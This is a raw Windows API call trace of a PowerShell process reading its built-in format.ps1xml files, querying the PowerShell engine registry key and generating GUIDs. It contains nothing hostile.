	[0670.124] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.124] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.126] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.126] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.127] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.127] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.127] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.128] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.128] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.129] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.132] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.132] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.133] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.133] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.134] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0xe67, lpOverlapped=0x0) returned 1
	[0670.134] ReadFile (in: hFile=0x324, lpBuffer=0x3474aff, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3474aff*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0670.134] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0670.135] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d468 | out: phkResult=0x12d468*=0x324) returned 0x0
	[0670.135] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3ec, lpData=0x0, lpcbData=0x12d3e8*=0x0 | out: lpType=0x12d3ec*=0x1, lpData=0x0, lpcbData=0x12d3e8*=0x56) returned 0x0
	[0670.135] CoTaskMemAlloc (cb=0x5a) returned 0x3188f0
	[0670.135] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3bc, lpData=0x3188f0, lpcbData=0x12d3b8*=0x56 | out: lpType=0x12d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d3b8*=0x56) returned 0x0
	[0670.135] CoTaskMemFree (pv=0x3188f0) 
	[0670.135] RegCloseKey (hKey=0x324) returned 0x0
	[0670.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0670.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0670.145] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x5e5d9da5, Data2=0xb28e, Data3=0x4232, Data4=([0]=0x92, [1]=0x2b, [2]=0x8e, [3]=0xb8, [4]=0x9a, [5]=0x74, [6]=0x27, [7]=0xe4))) returned 0x0
	[0670.145] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x3c9c2781, Data2=0x34c4, Data3=0x41e2, Data4=([0]=0x8b, [1]=0xef, [2]=0xa3, [3]=0x2d, [4]=0xff, [5]=0x6, [6]=0xaf, [7]=0xed))) returned 0x0
	[0670.146] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x5245c846, Data2=0x2f07, Data3=0x4b83, Data4=([0]=0xb6, [1]=0x3b, [2]=0x96, [3]=0x36, [4]=0xfb, [5]=0x35, [6]=0xc8, [7]=0xda))) returned 0x0
	[0670.146] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xdc8f76db, Data2=0xa132, Data3=0x45a2, Data4=([0]=0x81, [1]=0x81, [2]=0x29, [3]=0x2a, [4]=0x73, [5]=0x8c, [6]=0x3e, [7]=0x4e))) returned 0x0
	[0670.146] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xd889ba47, Data2=0x9e51, Data3=0x4a17, Data4=([0]=0xb8, [1]=0xc4, [2]=0xf5, [3]=0x5c, [4]=0x52, [5]=0xf8, [6]=0xaf, [7]=0x5f))) returned 0x0
	[0670.146] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xe842ab79, Data2=0x4edd, Data3=0x456d, Data4=([0]=0xb8, [1]=0xea, [2]=0xc9, [3]=0xf0, [4]=0x7, [5]=0x8d, [6]=0x88, [7]=0x92))) returned 0x0
	[0670.146] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x98b31b0d, Data2=0x6360, Data3=0x4b29, Data4=([0]=0x9d, [1]=0xef, [2]=0x9d, [3]=0x80, [4]=0xe9, [5]=0xa4, [6]=0x68, [7]=0x92))) returned 0x0
	[0670.147] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x6fbf1248, Data2=0xbb54, Data3=0x43f9, Data4=([0]=0x81, [1]=0x4e, [2]=0x33, [3]=0x7c, [4]=0xe6, [5]=0xf7, [6]=0x90, [7]=0xfa))) returned 0x0
	[0670.147] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x416c2cea, Data2=0xb892, Data3=0x4e6e, Data4=([0]=0x8c, [1]=0x36, [2]=0xa7, [3]=0xa0, [4]=0x4, [5]=0xba, [6]=0x16, [7]=0x74))) returned 0x0
	[0670.147] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x1e2cdbd5, Data2=0x24af, Data3=0x4083, Data4=([0]=0xb0, [1]=0x7, [2]=0x60, [3]=0xf6, [4]=0x6b, [5]=0x82, [6]=0xf9, [7]=0xbd))) returned 0x0
	[0670.147] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xc9d44f34, Data2=0x19a0, Data3=0x4303, Data4=([0]=0x9f, [1]=0xce, [2]=0x46, [3]=0xef, [4]=0xaf, [5]=0x6, [6]=0xc0, [7]=0x35))) returned 0x0
	[0670.147] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x6827b326, Data2=0x4e0, Data3=0x4bc0, Data4=([0]=0xba, [1]=0xa3, [2]=0x2d, [3]=0x70, [4]=0xc7, [5]=0xf3, [6]=0x61, [7]=0x6b))) returned 0x0
	[0670.148] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x6b856f0, Data2=0x123, Data3=0x498f, Data4=([0]=0x8f, [1]=0xe2, [2]=0xa0, [3]=0xe2, [4]=0x2d, [5]=0xee, [6]=0xe3, [7]=0x14))) returned 0x0
	[0670.148] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xcfc6d04, Data2=0x9132, Data3=0x4740, Data4=([0]=0x81, [1]=0xa1, [2]=0xac, [3]=0x69, [4]=0x40, [5]=0xb4, [6]=0xd5, [7]=0x7e))) returned 0x0
	[0670.148] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x3ea0dfcc, Data2=0xf621, Data3=0x45f6, Data4=([0]=0x94, [1]=0x28, [2]=0x64, [3]=0xba, [4]=0x42, [5]=0x9e, [6]=0xbb, [7]=0xc5))) returned 0x0
	[0670.148] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x10e5bafc, Data2=0xde94, Data3=0x454e, Data4=([0]=0xac, [1]=0x4, [2]=0x56, [3]=0x82, [4]=0xe9, [5]=0x77, [6]=0xdc, [7]=0xf6))) returned 0x0
	[0670.149] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x168749c2, Data2=0x5cb, Data3=0x4515, Data4=([0]=0x91, [1]=0xe0, [2]=0x51, [3]=0xf5, [4]=0xcc, [5]=0x59, [6]=0xc5, [7]=0x89))) returned 0x0
	[0670.149] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x8f2e5ee1, Data2=0x17ec, Data3=0x47f6, Data4=([0]=0x98, [1]=0xb3, [2]=0xbf, [3]=0xdc, [4]=0x17, [5]=0xa7, [6]=0xc3, [7]=0x5f))) returned 0x0
	[0670.149] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x101e0cc7, Data2=0xb6d7, Data3=0x4374, Data4=([0]=0x95, [1]=0x11, [2]=0x99, [3]=0xaa, [4]=0xe2, [5]=0x60, [6]=0x8a, [7]=0x94))) returned 0x0
	[0670.149] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xa8e8012a, Data2=0xe2d1, Data3=0x4f1e, Data4=([0]=0xa7, [1]=0x86, [2]=0xd3, [3]=0x8a, [4]=0x13, [5]=0xd, [6]=0xa5, [7]=0x5f))) returned 0x0
	[0670.150] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x57e3e778, Data2=0x5e96, Data3=0x4783, Data4=([0]=0x82, [1]=0x2, [2]=0xed, [3]=0x87, [4]=0x83, [5]=0x3c, [6]=0x4c, [7]=0x2))) returned 0x0
	[0670.150] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x39615efb, Data2=0xdbd2, Data3=0x4f26, Data4=([0]=0x99, [1]=0xee, [2]=0xfa, [3]=0x5f, [4]=0xb7, [5]=0xc0, [6]=0x56, [7]=0xe4))) returned 0x0
	[0670.150] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x5589dc03, Data2=0xe901, Data3=0x4e85, Data4=([0]=0x80, [1]=0xc5, [2]=0xe0, [3]=0xe8, [4]=0xc9, [5]=0x91, [6]=0x1, [7]=0xe9))) returned 0x0
	[0670.150] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x555a4a01, Data2=0x3b6, Data3=0x4f74, Data4=([0]=0x93, [1]=0x78, [2]=0xcf, [3]=0xbd, [4]=0xa, [5]=0x49, [6]=0x46, [7]=0x2c))) returned 0x0
	[0670.150] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x47215300, Data2=0xec5f, Data3=0x409d, Data4=([0]=0x80, [1]=0xd0, [2]=0x59, [3]=0x78, [4]=0xdc, [5]=0x4f, [6]=0xf7, [7]=0xdf))) returned 0x0
	[0670.150] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x2c805f65, Data2=0x34a2, Data3=0x4bcf, Data4=([0]=0x9e, [1]=0xdf, [2]=0xb2, [3]=0xe, [4]=0x33, [5]=0x15, [6]=0xb2, [7]=0xd9))) returned 0x0
	[0670.151] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xb8004036, Data2=0xfb6d, Data3=0x4183, Data4=([0]=0xbc, [1]=0x32, [2]=0x30, [3]=0x79, [4]=0x1b, [5]=0x78, [6]=0xd6, [7]=0xaf))) returned 0x0
	[0670.151] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xac5bdd7, Data2=0xc285, Data3=0x4611, Data4=([0]=0x85, [1]=0xb2, [2]=0x15, [3]=0x59, [4]=0x84, [5]=0xfc, [6]=0x49, [7]=0xe7))) returned 0x0
	[0670.151] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xf7092b11, Data2=0xe40c, Data3=0x4256, Data4=([0]=0xa8, [1]=0xbe, [2]=0x5e, [3]=0xb8, [4]=0x4b, [5]=0xea, [6]=0x9a, [7]=0xb5))) returned 0x0
	[0670.151] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xf904e32d, Data2=0xae25, Data3=0x465b, Data4=([0]=0x81, [1]=0x48, [2]=0x4c, [3]=0x65, [4]=0xe8, [5]=0xf2, [6]=0x24, [7]=0xf9))) returned 0x0
	[0670.151] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x8b1919bc, Data2=0x2b0f, Data3=0x4fd3, Data4=([0]=0xb0, [1]=0xf2, [2]=0xf6, [3]=0xa1, [4]=0x11, [5]=0xbe, [6]=0x95, [7]=0xf9))) returned 0x0
	[0670.152] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xa4e0e7c3, Data2=0xfaca, Data3=0x4dd0, Data4=([0]=0x86, [1]=0x7a, [2]=0xad, [3]=0xe1, [4]=0xf9, [5]=0x11, [6]=0x97, [7]=0xcc))) returned 0x0
	[0670.152] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xe4414a2d, Data2=0xd8d6, Data3=0x42a4, Data4=([0]=0xbd, [1]=0x92, [2]=0xe7, [3]=0x1a, [4]=0xfe, [5]=0xc7, [6]=0x89, [7]=0xcf))) returned 0x0
	[0670.158] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x40074173, Data2=0xf489, Data3=0x464f, Data4=([0]=0xbc, [1]=0x33, [2]=0xf4, [3]=0xdc, [4]=0xac, [5]=0x5c, [6]=0x5a, [7]=0xe7))) returned 0x0
	[0670.159] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x68434aab, Data2=0xe1d4, Data3=0x4e41, Data4=([0]=0x8f, [1]=0xaa, [2]=0x1d, [3]=0x7f, [4]=0x93, [5]=0x9a, [6]=0xbe, [7]=0xe8))) returned 0x0
	[0670.159] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xc11120a3, Data2=0xfe3d, Data3=0x441e, Data4=([0]=0xb3, [1]=0x44, [2]=0x9c, [3]=0x1a, [4]=0x6b, [5]=0x58, [6]=0x73, [7]=0x41))) returned 0x0
	[0670.159] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x9fe015d2, Data2=0x1065, Data3=0x490c, Data4=([0]=0xa4, [1]=0x86, [2]=0xad, [3]=0x86, [4]=0x25, [5]=0x44, [6]=0xb6, [7]=0xc9))) returned 0x0
	[0670.159] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xfd34773, Data2=0x5812, Data3=0x4a2d, Data4=([0]=0x9d, [1]=0xb0, [2]=0x81, [3]=0x31, [4]=0x66, [5]=0xd1, [6]=0x2c, [7]=0x5b))) returned 0x0
	[0670.159] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xc0ae73c1, Data2=0x9f3c, Data3=0x4095, Data4=([0]=0x96, [1]=0x57, [2]=0xb, [3]=0xc1, [4]=0xbf, [5]=0x87, [6]=0xd9, [7]=0x36))) returned 0x0
	[0670.159] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x15e390bf, Data2=0xa8dc, Data3=0x45b6, Data4=([0]=0x88, [1]=0x6c, [2]=0x30, [3]=0x7e, [4]=0x4f, [5]=0x7, [6]=0x1, [7]=0xa6))) returned 0x0
	[0670.159] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x7fa62b6a, Data2=0x192a, Data3=0x4b22, Data4=([0]=0x8e, [1]=0x10, [2]=0x80, [3]=0x1e, [4]=0xa, [5]=0xb4, [6]=0xdf, [7]=0xf0))) returned 0x0
	[0670.160] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x27d8131b, Data2=0x9cb4, Data3=0x4df9, Data4=([0]=0xb8, [1]=0x20, [2]=0x93, [3]=0xb, [4]=0x2, [5]=0xd1, [6]=0xd6, [7]=0xc1))) returned 0x0
	[0670.160] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x9fda85bb, Data2=0x335a, Data3=0x4361, Data4=([0]=0x91, [1]=0x47, [2]=0x76, [3]=0xd6, [4]=0xe1, [5]=0x6b, [6]=0x5c, [7]=0x69))) returned 0x0
	[0670.160] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x19498920, Data2=0x9d59, Data3=0x47c7, Data4=([0]=0xb4, [1]=0x7f, [2]=0x89, [3]=0xf5, [4]=0xe7, [5]=0x5b, [6]=0x76, [7]=0xd7))) returned 0x0
	[0670.160] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x18aa81a, Data2=0x5047, Data3=0x4d37, Data4=([0]=0xb4, [1]=0x2b, [2]=0xee, [3]=0xfd, [4]=0x95, [5]=0xb8, [6]=0x31, [7]=0x29))) returned 0x0
	[0670.160] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x1ccc75df, Data2=0x4eee, Data3=0x4430, Data4=([0]=0xb9, [1]=0x7e, [2]=0xf1, [3]=0x8a, [4]=0xbd, [5]=0x2f, [6]=0xf2, [7]=0x28))) returned 0x0
	[0670.160] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xf1cec438, Data2=0xc499, Data3=0x480d, Data4=([0]=0xa7, [1]=0x27, [2]=0x90, [3]=0xdd, [4]=0xd7, [5]=0xfe, [6]=0x3d, [7]=0x43))) returned 0x0
	[0670.161] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xd1e55811, Data2=0x2938, Data3=0x4c61, Data4=([0]=0xa9, [1]=0x60, [2]=0x6c, [3]=0x9e, [4]=0x54, [5]=0x5a, [6]=0x1d, [7]=0x76))) returned 0x0
	[0670.161] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0670.161] GetFileType (hFile=0x324) returned 0x1
	[0670.161] SetErrorMode (uMode=0x1) returned 0x1
	[0670.161] GetFileType (hFile=0x324) returned 0x1
	[0670.161] ReadFile (in: hFile=0x324, lpBuffer=0x34031e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x34031e0*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.162] ReadFile (in: hFile=0x324, lpBuffer=0x34031e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x34031e0*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.163] ReadFile (in: hFile=0x324, lpBuffer=0x34031e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x34031e0*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.163] ReadFile (in: hFile=0x324, lpBuffer=0x34031e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x34031e0*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.163] ReadFile (in: hFile=0x324, lpBuffer=0x34031e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x34031e0*, lpNumberOfBytesRead=0x12d3d8*=0x8b4, lpOverlapped=0x0) returned 1
	[0670.163] ReadFile (in: hFile=0x324, lpBuffer=0x34025fc, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x34025fc*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0671.541] ReadFile (in: hFile=0x324, lpBuffer=0x34031e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x34031e0*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0671.541] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d468 | out: phkResult=0x12d468*=0x324) returned 0x0
	[0671.541] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3ec, lpData=0x0, lpcbData=0x12d3e8*=0x0 | out: lpType=0x12d3ec*=0x1, lpData=0x0, lpcbData=0x12d3e8*=0x56) returned 0x0
	[0671.542] CoTaskMemAlloc (cb=0x5a) returned 0x3188f0
	[0671.542] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3bc, lpData=0x3188f0, lpcbData=0x12d3b8*=0x56 | out: lpType=0x12d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d3b8*=0x56) returned 0x0
	[0671.542] CoTaskMemFree (pv=0x3188f0) 
	[0671.542] RegCloseKey (hKey=0x324) returned 0x0
	[0671.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0671.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0671.542] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x1be1e5e8, Data2=0x146c, Data3=0x4a02, Data4=([0]=0xb0, [1]=0xb6, [2]=0xef, [3]=0x61, [4]=0x93, [5]=0x0, [6]=0x4a, [7]=0x98))) returned 0x0
	[0671.543] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xb3979dce, Data2=0x23a5, Data3=0x4c86, Data4=([0]=0x9a, [1]=0x8f, [2]=0x84, [3]=0xc4, [4]=0xaf, [5]=0xf6, [6]=0x9f, [7]=0x36))) returned 0x0
	[0671.543] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0671.543] GetFileType (hFile=0x324) returned 0x1
	[0671.543] SetErrorMode (uMode=0x1) returned 0x1
	[0671.543] GetFileType (hFile=0x324) returned 0x1
	[0671.543] ReadFile (in: hFile=0x324, lpBuffer=0x3440fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3440fc8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.544] ReadFile (in: hFile=0x324, lpBuffer=0x3440fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3440fc8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.544] ReadFile (in: hFile=0x324, lpBuffer=0x3440fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3440fc8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.545] ReadFile (in: hFile=0x324, lpBuffer=0x3440fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3440fc8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0671.545] ReadFile (in: hFile=0x324, lpBuffer=0x3440fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3440fc8*, lpNumberOfBytesRead=0x12d3d8*=0xe98, lpOverlapped=0x0) returned 1
	[0671.545] ReadFile (in: hFile=0x324, lpBuffer=0x34405c8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x34405c8*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0671.545] ReadFile (in: hFile=0x324, lpBuffer=0x3440fc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3440fc8*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0671.545] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d468 | out: phkResult=0x12d468*=0x324) returned 0x0
